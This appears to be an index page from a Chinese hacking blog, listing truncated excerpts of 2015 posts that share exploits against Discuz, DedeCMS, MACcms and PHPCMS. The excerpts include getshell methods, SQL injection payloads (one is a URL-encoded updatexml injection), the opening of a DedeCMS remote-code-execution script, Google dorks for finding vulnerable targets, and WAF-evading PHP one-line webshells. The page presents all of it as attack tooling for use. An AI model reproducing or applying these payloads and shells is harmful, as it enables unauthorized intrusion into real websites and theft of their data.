• DZ 6.x getshell [20151117]

    DZ 6.x getshell [20151117]
    网上有dz 7.x和dz x系列的uc_key 利用方式,今天遇到了一个dz6.0的网站,于是分析了下代码,改了下利用程序,分享给需要的人。uc_key getshell 是一个影响比较广存在比较久的漏洞,基本上使用ucenter做用户中心的程序都可以使用,但需要根据特定程序写特定利用。最新版本的dz好像是修补了,没有具体看代码了。 ps:需要或者感觉不错的请挥挥你的小手 点击 “顶” 注意三个地...
    作者:unhonker| 发布:2015年11月17日 | 分类:漏洞公布 | 阅读:3,892次| 标签:
  • DEDECMS 20150618 注入一枚(过防注入\可注入管理员账户)

    DEDECMS 20150618 注入一枚(过防注入\可注入管理员账户)
    作者:′雨。 首先来看一下 function XSSClean($val) {[/align]     global $cfg_soft_lang;      if($cfg_soft_lang=='gb2312') gb2utf8($val);      if (is_array($val))      {          while (list($key) = each($val))          {              if(in_array($key,array('tags','body','dede_fields','dede_addonfields','dopost','introduce'))) continue;     ...
    作者:unhonker| 发布:2015年10月10日 | 分类:漏洞公布 | 阅读:5,287次| 标签:
  • MACcms通杀型后台拿shell

    MACcms通杀型后台拿shell
    90sec@Joseph 此漏洞的缘由是来自论坛的一哥们求助拿shell才无奈的去审计 看见这个模块编辑就总感觉有漏洞存在当然这里并没有想象的那么简单,咱们之前遇到的模版编辑漏洞已经在这个版本修复了 漏洞文件: elseif($method=='save') {     $path = be('post','path'); $path = str_replace('\\','/',$path);     $file =  be('post','file'); $file = str_replace('\\',...
    作者:unhonker| 发布:2015年9月17日 | 分类:漏洞公布 | 阅读:9,203次| 标签:
  • 旁注查询脚本(python)

    旁注查询脚本(python)
    # coding=utf-8 #author: 小续/Joseph       import urllib import urllib2 import base64 import re import sys #填写供可以使用的key AccountKey='OP8/b5S8imIbXfU1yOYpLbL7tcEgjJ/RJAJjJkTcrJo' top=1000 skip=0 format='json' def BingSearch(query):     payload={}     payload['$top']=top     payload['$skip']=skip     payload['$format']=...
    作者:unhonker| 发布:2015年8月22日 | 分类:技术文章 | 阅读:3,385次|
  • Meinestadt24注入漏洞

    Meinestadt24注入漏洞
    [-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-]   Exploit Title : Meinestadt24 SQL Injection Vulnerability   Exploit Author : Ashiyane Digital Security Team   Google Dork One : intext:© 2015 meinestadt24 Google Dork Two : inurl:nachrichten.php?artikel_id=   Date : 2015-7-25   Tested On : Windows Se7en   [-...
    作者:unhonker| 发布:2015年7月27日 | 分类:漏洞公布 | 阅读:4,612次| 标签:
  • phpcms v9最新高危sql注入exp

    phpcms v9最新高危sql注入exp
    获取当前数据库 http://192.168.1.139:8080/phpcms/index.php?m=member&c=index&a=login post: forward=http%253A%252F%252F192.168.1.139%253A8080%252Fphpcms%252Findex.php%253Fm%253Dmember&username=phpcms&password=123456%26username%3d%2527%2bunion%2bselect%2b%25272%2527%252c%2527test%255c%2527%252cupdatexml(1%252cconcat(0x5e24%252c(select%...
    作者:unhonker| 发布:2015年7月24日 | 分类:漏洞公布 | 阅读:15,515次| 标签:
  • dedecms远程代码执行利用脚本

    dedecms远程代码执行利用脚本
    转自90sec@Joseph #! /usr/bin/env python #coding=utf-8 #Joseph(小续)   import requests import sys import re def main():     try:         url="http://"+sys.argv[1].strip('http://')     except IndexError:         print '''         poc: dede.py [url]http://www.baidu.com/[/url]         '''     payload="/install/index.ph...
    作者:unhonker| 发布:2015年7月23日 | 分类:漏洞公布 | 阅读:5,738次| 标签:
  • PHPCMS用户登陆SQL注入漏洞分析

    PHPCMS用户登陆SQL注入漏洞分析
    文章为转载。 0x00 简述 之前manning在调漏洞的时候,突然发现正常登陆不上去了,当时帮忙跟了下phpcms的登陆流程。之后感觉这个流程貌似有些问题,就仔细看了下,没想到真是一个0day~~ 0x01 漏洞原理 我们先直接看这个漏洞最根源的地方,phpsso/index.php文件所有的操作都存在严重的注入问题,这个类文件的构造函数最先调用它的父构造函数,通过auth_key来解析POST传入的da...
    作者:unhonker| 发布:2015年7月22日 | 分类:技术文章, 漏洞公布 | 阅读:5,960次| 标签:
  • 过狗过盾无特征无动态函数PHP一句话

    过狗过盾无特征无动态函数PHP一句话
    转自90sec@phithon 分享些不需要动态函数、不用eval、不含敏感函数、免杀免拦截的一句话。(少部分一句话需要php5.4.8+、或sqlite/pdo/yaml/memcached扩展等) 原理:https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html 所有一句话使用方法基本都是: http:// target/shell.php?e=assert 密码pass 分享些不需要动态函数、不用eval、不含敏感函数、免杀免拦...
    作者:unhonker| 发布:2015年7月20日 | 分类:技术文章 | 阅读:4,201次| 标签: